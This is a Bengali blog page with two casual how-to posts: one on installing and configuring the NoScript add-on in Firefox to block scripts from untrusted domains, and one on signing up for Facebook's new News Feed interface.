উপরের কাজগুলো আশা করি সঠিক ভাবে করেছেন । এবার NoScript Add-ons ইন্সটল দেওয়ার পালা । এটা কিভাবে কাজ করে তা বলতে গেলে অনেক সময় লেগে যাবে ।এটি অনাকাঙ্ক্ষিত সকল java script কে বাঁধা দিতে পারে যে script গুলো আপনার ব্রাউজিং স্পীডকে স্লো করে দেয় । পাশাপাশি এটি আপনার ওয়েব ব্রাউজিং এ নিরাপত্তা নিশ্চিত করে । এই দেখুন কাকে কি বলছি ! এগুলো তো আপনারা জানেন ।  তাই চলুন শুধু ইন্সটল ও সেটিং পদ্ধতি নিয়ে কিছু কথা বলি ।
১। এখানে যান । ইন্সটল কে ক্লিক করুন । allow করুন । কিছুক্ষণ অপেক্ষা করুন । download শেষে ইন্সটল করুন ।
২। Mozilla Firefox এর Tools-Add-ons-Extensions এ গিয়ে NoScript এর options এ ক্লিক করুন ।

৩। Whitelist এ ক্লিক করুন । Whitelist এর সকল url সিলেক্ট করে কীবোর্ড এ ডিলিট চাপুন । অর্থাৎ Whitelist এর সকল url ডিলিট করে ফেলুন । ok ক্লিক করুন ।

৪। Mozilla Firefox ক্লোজ করে আবার চালু করুন ।
৫। ভাল ফলাফলের জন্য আপনাকে manually java Script বন্ধ করতে হবে । আমি এখানে একটি ওয়েব সাইট দিয়ে উদাহরণ দিব । কিন্তু আপনি যখনই কোন ওয়েব সাইটে  যাবেন তখনই manually java Script বন্ধ করে দিবেন । একবার বন্ধ করলে প্রতিদিন আপনাকে আর এই কাজ করতে হবেনা ।
৬। ধরুন আপনি http://bdmusic24.net/  সাইটে প্রবেশ করলেন । Firefox এর address bar এর ঠিক বামে , যেখানে favicon থাকে । সেখানে NoScript এর favicon  দেখাচ্ছে. সেখানে ক্লিক করুন । Untrusted এ ক্লিক করুন । mark ………….. as untrusted  . এখানে অনেক গুলো Domain দেখাচ্ছে - যেমন -
mark wordpress.com as untrusted
mark facebook.com as untrusted
mark gandrad.org as untrusted
mark  onclikads.net as untrusted
ইত্যাদি।
এক এক করে প্রতি টি Domain এ ক্লিক করুন । এমনকি http://bdmusic24.net/  সাইটকেও ।  তাহলে সবগুলো  Untrusted লিস্টে যোগ হবে । এই Domain গুলো যদি অন্য কোন সাইটে ও থাকে তারপরও আপনাকে আর কখনও এগুলো Untrusted লিস্টে যোগ করতে বলা হবে না ।  আমি কি বুঝাতে পেরেছি , নাকি পেরেছি ?

৭। Firefox এর নিচের দিকে NoScript এর একটি বার দেখাবে । সেখানে ম্যাসেজ এ আপনি দেখতে পাবেন কত টি Script কে বন্ধ করা হয়েছে । নিচের ছবির মত ।

৮। আর একটি কথা কিছু সাইট java script ছাড়া চালান সম্ভব হবে na। যেমন - ফেসবুক ।
আপনি পূর্বে ফেসবুক Untrusted এ নিয়েছেন । সমস্যা নেই । যখন ফেসবুক ব্যবহার করবেন । তখন Right-click করে temporary allow facebook.com করে দিন ।Download করার জন্য download manager add-ons ব্যবহার করতে পারেন ।
যেহেতু এই পদ্ধতি একেবারে ফ্রি নয় , সেহেতু একবারের জন্য আমার টিউন ফলো করে দেখুন , আপনার লাভ হচ্ছে নাকি লস ।
ভাল থাকবেন সবাই ।
Tag : ,

সক্রিয় করুন Facebook new look!!!

সক্রিয় করুন ফেসবুকের নতুন লুক!!!

106
ফেসবুক আবার একটি বিশাল চমক নিয়ে আসল! ফেসবুক ইন্টারফেসের পরিবর্তন এসেছিল অনেক আগে, যদিও কিছু কিছু পরিবর্তন আনা হয়েছিল। কিন্তু এইবার ফেসবুকে আনা হয়েছে সম্পূর্ণ আলাদা ইন্টারফেস। এখন আপনিও সক্রিয় করতে পারেন ফেসবুকের এই অসাধারণ ইন্টারফেস! কিছু সহজ পদ্ধতি অনুসরণ করে আপনিও এটি উপভোগ করে পারবেন!!! ;)
নিচের পদ্ধতি অনুসরণ করুন, আর কি কি পরিবর্তন আনা হয়েছে জানতে চাইলে এই ভিডিওটি দেখতে পারেন:
Video link- https://www.youtube.com/watch?v=5ss64KfgiKM

আপনার ফেসবুক আকাউন্টে যে ভাবে এই নতুন নিউজফিড সক্রিয় করতে পারবেন:

১. আপনার ফেসবুক আকাউন্টে অবশ্যই Logged In থাকতে হবে।
২. লগইন থাকা অবস্থায় এই লিংকএ প্রবেশ করতে হবে- https://www.facebook.com/about/newsfeed
৩. ঐ পেজের একেবারে শেষে "Try the New Look" বাটনে ক্লিক করুন।
 
৪. কাজ শেষ, আপনি এখন Waiting list এ আছেন। ফেসবুক যত দ্রুত সম্ভব আপনাকে নেটিফিকেশন পাঠিয়ে দিবে, যে আপনার একাউন্টে এটি সক্রিয় হয়েছে।

৫. কিছু দিন অপেক্ষা করুন, দেখবেন ফেসবুক আপনাকে নোটিফিকেশন পাঠিয়ে দিয়েছে!!
*উপভোগ করুন ফেসবুকের এই অসাধারণ লুক!!
Tag : ,

The Won Blog Of EARN FOR TEICKS. The Blog Created by Bijoy Kumar Biswas. Designed by বিজয়*বিজন*বিজু